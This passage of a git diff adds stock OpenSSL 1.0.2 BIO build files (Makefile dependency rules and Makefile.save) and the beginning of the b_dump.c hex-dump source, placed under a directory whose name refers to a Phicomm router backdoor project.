+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+b_dump.o: ../../e_os.h ../../include/openssl/bio.h
+b_dump.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+b_dump.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+b_dump.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+b_dump.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+b_dump.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+b_dump.o: ../../include/openssl/symhacks.h ../cryptlib.h b_dump.c bio_lcl.h
+b_print.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+b_print.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+b_print.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+b_print.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+b_print.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+b_print.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+b_print.o: ../../include/openssl/symhacks.h ../cryptlib.h b_print.c
+b_sock.o: ../../e_os.h ../../include/openssl/bio.h
+b_sock.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+b_sock.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+b_sock.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+b_sock.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+b_sock.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+b_sock.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+b_sock.o: ../cryptlib.h b_sock.c
+bf_buff.o: ../../e_os.h ../../include/openssl/bio.h
+bf_buff.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bf_buff.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bf_buff.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bf_buff.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bf_buff.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bf_buff.o: ../../include/openssl/symhacks.h ../cryptlib.h bf_buff.c
+bf_nbio.o: ../../e_os.h ../../include/openssl/bio.h
+bf_nbio.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bf_nbio.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bf_nbio.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bf_nbio.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bf_nbio.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+bf_nbio.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+bf_nbio.o: ../cryptlib.h bf_nbio.c
+bf_null.o: ../../e_os.h ../../include/openssl/bio.h
+bf_null.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bf_null.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bf_null.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bf_null.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bf_null.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bf_null.o: ../../include/openssl/symhacks.h ../cryptlib.h bf_null.c
+bio_cb.o: ../../e_os.h ../../include/openssl/bio.h
+bio_cb.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bio_cb.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bio_cb.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bio_cb.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bio_cb.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bio_cb.o: ../../include/openssl/symhacks.h ../cryptlib.h bio_cb.c
+bio_err.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+bio_err.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bio_err.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bio_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bio_err.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bio_err.o: ../../include/openssl/symhacks.h bio_err.c
+bio_lib.o: ../../e_os.h ../../include/openssl/bio.h
+bio_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bio_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bio_lib.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bio_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bio_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bio_lib.o: ../../include/openssl/symhacks.h ../cryptlib.h bio_lib.c
+bss_acpt.o: ../../e_os.h ../../include/openssl/bio.h
+bss_acpt.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bss_acpt.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bss_acpt.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bss_acpt.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bss_acpt.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bss_acpt.o: ../../include/openssl/symhacks.h ../cryptlib.h bss_acpt.c
+bss_bio.o: ../../e_os.h ../../include/openssl/bio.h
+bss_bio.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+bss_bio.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+bss_bio.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+bss_bio.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+bss_bio.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+bss_bio.o: bss_bio.c
+bss_conn.o: ../../e_os.h ../../include/openssl/bio.h
+bss_conn.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bss_conn.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bss_conn.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bss_conn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bss_conn.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bss_conn.o: ../../include/openssl/symhacks.h ../cryptlib.h bss_conn.c
+bss_dgram.o: ../../e_os.h ../../include/openssl/bio.h
+bss_dgram.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bss_dgram.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bss_dgram.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bss_dgram.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bss_dgram.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bss_dgram.o: ../../include/openssl/symhacks.h ../cryptlib.h bss_dgram.c
+bss_fd.o: ../../e_os.h ../../include/openssl/bio.h
+bss_fd.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bss_fd.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bss_fd.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bss_fd.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bss_fd.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bss_fd.o: ../../include/openssl/symhacks.h ../cryptlib.h bio_lcl.h bss_fd.c
+bss_file.o: ../../e_os.h ../../include/openssl/bio.h
+bss_file.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bss_file.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bss_file.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bss_file.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bss_file.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bss_file.o: ../../include/openssl/symhacks.h ../cryptlib.h bio_lcl.h bss_file.c
+bss_log.o: ../../e_os.h ../../include/openssl/bio.h
+bss_log.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bss_log.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bss_log.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bss_log.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bss_log.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bss_log.o: ../../include/openssl/symhacks.h ../cryptlib.h bss_log.c
+bss_mem.o: ../../e_os.h ../../include/openssl/bio.h
+bss_mem.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bss_mem.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bss_mem.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bss_mem.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bss_mem.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bss_mem.o: ../../include/openssl/symhacks.h ../cryptlib.h bss_mem.c
+bss_null.o: ../../e_os.h ../../include/openssl/bio.h
+bss_null.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bss_null.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bss_null.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bss_null.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bss_null.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bss_null.o: ../../include/openssl/symhacks.h ../cryptlib.h bss_null.c
+bss_sock.o: ../../e_os.h ../../include/openssl/bio.h
+bss_sock.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bss_sock.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bss_sock.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bss_sock.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bss_sock.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bss_sock.o: ../../include/openssl/symhacks.h ../cryptlib.h bss_sock.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/Makefile.save
new file mode 100644
index 0000000..c395d80
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/Makefile.save
@@ -0,0 +1,222 @@
+#
+# OpenSSL/crypto/bio/Makefile
+#
+
+DIR=	bio
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= bio_lib.c bio_cb.c bio_err.c \
+	bss_mem.c bss_null.c bss_fd.c \
+	bss_file.c bss_sock.c bss_conn.c \
+	bf_null.c bf_buff.c b_print.c b_dump.c \
+	b_sock.c bss_acpt.c bf_nbio.c bss_log.c bss_bio.c \
+	bss_dgram.c
+#	bf_lbuf.c
+LIBOBJ= bio_lib.o bio_cb.o bio_err.o \
+	bss_mem.o bss_null.o bss_fd.o \
+	bss_file.o bss_sock.o bss_conn.o \
+	bf_null.o bf_buff.o b_print.o b_dump.o \
+	b_sock.o bss_acpt.o bf_nbio.o bss_log.o bss_bio.o \
+	bss_dgram.o
+#	bf_lbuf.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= bio.h
+HEADER=	bio_lcl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+b_dump.o: ../../e_os.h ../../include/openssl/bio.h
+b_dump.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+b_dump.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+b_dump.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+b_dump.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+b_dump.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+b_dump.o: ../../include/openssl/symhacks.h ../cryptlib.h b_dump.c bio_lcl.h
+b_print.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+b_print.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+b_print.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+b_print.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+b_print.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+b_print.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+b_print.o: ../../include/openssl/symhacks.h ../cryptlib.h b_print.c
+b_sock.o: ../../e_os.h ../../include/openssl/bio.h
+b_sock.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+b_sock.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+b_sock.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+b_sock.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+b_sock.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+b_sock.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+b_sock.o: ../cryptlib.h b_sock.c
+bf_buff.o: ../../e_os.h ../../include/openssl/bio.h
+bf_buff.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bf_buff.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bf_buff.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bf_buff.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bf_buff.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bf_buff.o: ../../include/openssl/symhacks.h ../cryptlib.h bf_buff.c
+bf_nbio.o: ../../e_os.h ../../include/openssl/bio.h
+bf_nbio.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bf_nbio.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bf_nbio.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bf_nbio.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bf_nbio.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+bf_nbio.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+bf_nbio.o: ../cryptlib.h bf_nbio.c
+bf_null.o: ../../e_os.h ../../include/openssl/bio.h
+bf_null.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bf_null.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bf_null.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bf_null.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bf_null.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bf_null.o: ../../include/openssl/symhacks.h ../cryptlib.h bf_null.c
+bio_cb.o: ../../e_os.h ../../include/openssl/bio.h
+bio_cb.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bio_cb.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bio_cb.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bio_cb.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bio_cb.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bio_cb.o: ../../include/openssl/symhacks.h ../cryptlib.h bio_cb.c
+bio_err.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+bio_err.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bio_err.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bio_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bio_err.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bio_err.o: ../../include/openssl/symhacks.h bio_err.c
+bio_lib.o: ../../e_os.h ../../include/openssl/bio.h
+bio_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bio_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bio_lib.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bio_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bio_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bio_lib.o: ../../include/openssl/symhacks.h ../cryptlib.h bio_lib.c
+bss_acpt.o: ../../e_os.h ../../include/openssl/bio.h
+bss_acpt.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bss_acpt.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bss_acpt.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bss_acpt.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bss_acpt.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bss_acpt.o: ../../include/openssl/symhacks.h ../cryptlib.h bss_acpt.c
+bss_bio.o: ../../e_os.h ../../include/openssl/bio.h
+bss_bio.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+bss_bio.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+bss_bio.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+bss_bio.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+bss_bio.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+bss_bio.o: bss_bio.c
+bss_conn.o: ../../e_os.h ../../include/openssl/bio.h
+bss_conn.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bss_conn.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bss_conn.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bss_conn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bss_conn.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bss_conn.o: ../../include/openssl/symhacks.h ../cryptlib.h bss_conn.c
+bss_dgram.o: ../../e_os.h ../../include/openssl/bio.h
+bss_dgram.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bss_dgram.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bss_dgram.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bss_dgram.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bss_dgram.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bss_dgram.o: ../../include/openssl/symhacks.h ../cryptlib.h bss_dgram.c
+bss_fd.o: ../../e_os.h ../../include/openssl/bio.h
+bss_fd.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bss_fd.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bss_fd.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bss_fd.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bss_fd.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bss_fd.o: ../../include/openssl/symhacks.h ../cryptlib.h bio_lcl.h bss_fd.c
+bss_file.o: ../../e_os.h ../../include/openssl/bio.h
+bss_file.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bss_file.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bss_file.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bss_file.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bss_file.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bss_file.o: ../../include/openssl/symhacks.h ../cryptlib.h bio_lcl.h bss_file.c
+bss_log.o: ../../e_os.h ../../include/openssl/bio.h
+bss_log.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bss_log.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bss_log.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bss_log.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bss_log.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bss_log.o: ../../include/openssl/symhacks.h ../cryptlib.h bss_log.c
+bss_mem.o: ../../e_os.h ../../include/openssl/bio.h
+bss_mem.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bss_mem.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bss_mem.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bss_mem.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bss_mem.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bss_mem.o: ../../include/openssl/symhacks.h ../cryptlib.h bss_mem.c
+bss_null.o: ../../e_os.h ../../include/openssl/bio.h
+bss_null.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bss_null.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bss_null.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bss_null.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bss_null.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bss_null.o: ../../include/openssl/symhacks.h ../cryptlib.h bss_null.c
+bss_sock.o: ../../e_os.h ../../include/openssl/bio.h
+bss_sock.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bss_sock.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bss_sock.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+bss_sock.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bss_sock.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bss_sock.o: ../../include/openssl/symhacks.h ../cryptlib.h bss_sock.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/b_dump.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/b_dump.c
new file mode 100644
index 0000000..ed8e521
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/b_dump.c
@@ -0,0 +1,209 @@
+/* crypto/bio/b_dump.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/*
+ * Stolen from tjh's ssl/ssl_trc.c stuff.
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include "bio_lcl.h"
+
+#define TRUNCATE
+#define DUMP_WIDTH      16
+#define DUMP_WIDTH_LESS_INDENT(i) (DUMP_WIDTH-((i-(i>6?6:i)+3)/4))
+
+int BIO_dump_cb(int (*cb) (const void *data, size_t len, void *u),
+                void *u, const char *s, int len)
+{
+    return BIO_dump_indent_cb(cb, u, s, len, 0);
+}
+
+int BIO_dump_indent_cb(int (*cb) (const void *data, size_t len, void *u),
+                       void *u, const char *s, int len, int indent)
+{
+    int ret = 0;
+    char buf[288 + 1], tmp[20], str[128 + 1];
+    int i, j, rows, trc;
+    unsigned char ch;
+    int dump_width;
+
+    trc = 0;
+
+#ifdef TRUNCATE
+    for (; (len > 0) && ((s[len - 1] == ' ') || (s[len - 1] == '\0')); len--)
+        trc++;
+#endif
+
+    if (indent < 0)
+        indent = 0;
+    if (indent) {
+        if (indent > 128)
+            indent = 128;
+        memset(str, ' ', indent);
+    }
+    str[indent] = '\0';
+
+    dump_width = DUMP_WIDTH_LESS_INDENT(indent);
+    rows = (len / dump_width);
+    if ((rows * dump_width) < len)
+        rows++;
+    for (i = 0; i < rows; i++) {
+        buf[0] = '\0';          /* start with empty string */
+        BUF_strlcpy(buf, str, sizeof buf);
+        BIO_snprintf(tmp, sizeof tmp, "%04x - ", i * dump_width);
+        BUF_strlcat(buf, tmp, sizeof buf);
+        for (j = 0; j < dump_width; j++) {
+            if (((i * dump_width) + j) >= len) {
+                BUF_strlcat(buf, "   ", sizeof buf);
+            } else {
+                ch = ((unsigned char)*(s + i * dump_width + j)) & 0xff;
+                BIO_snprintf(tmp, sizeof tmp, "%02x%c", ch,
+                             j == 7 ? '-' : ' ');
+                BUF_strlcat(buf, tmp, sizeof buf);
+            }
+        }
+        BUF_strlcat(buf, "  ", sizeof buf);
+        for (j = 0; j < dump_width; j++) {
+            if (((i * dump_width) + j) >= len)
+                break;
+            ch = ((unsigned char)*(s + i * dump_width + j)) & 0xff;
+#ifndef CHARSET_EBCDIC
+            BIO_snprintf(tmp, sizeof tmp, "%c",
+                         ((ch >= ' ') && (ch <= '~')) ? ch : '.');
+#else
+            BIO_snprintf(tmp, sizeof tmp, "%c",
+                         ((ch >= os_toascii[' ']) && (ch <= os_toascii['~']))
+                         ? os_toebcdic[ch]
+                         : '.');
+#endif
+            BUF_strlcat(buf, tmp, sizeof buf);
+        }
+        BUF_strlcat(buf, "\n", sizeof buf);
+        /*
+         * if this is the last call then update the ddt_dump thing so that we
+         * will move the selection point in the debug window
+         */
+        ret += cb((void *)buf, strlen(buf), u);
+    }
+#ifdef TRUNCATE
+    if (trc > 0) {
+        BIO_snprintf(buf, sizeof buf, "%s%04x - <SPACES/NULS>\n", str,
+                     len + trc);
+        ret += cb((void *)buf, strlen(buf), u);
+    }
+#endif
+    return (ret);
+}
+
+#ifndef OPENSSL_NO_FP_API
+static int write_fp(const void *data, size_t len, void *fp)
+{
+    return UP_fwrite(data, len, 1, fp);
+}
+
+int BIO_dump_fp(FILE *fp, const char *s, int len)
+{
+    return BIO_dump_cb(write_fp, fp, s, len);
+}
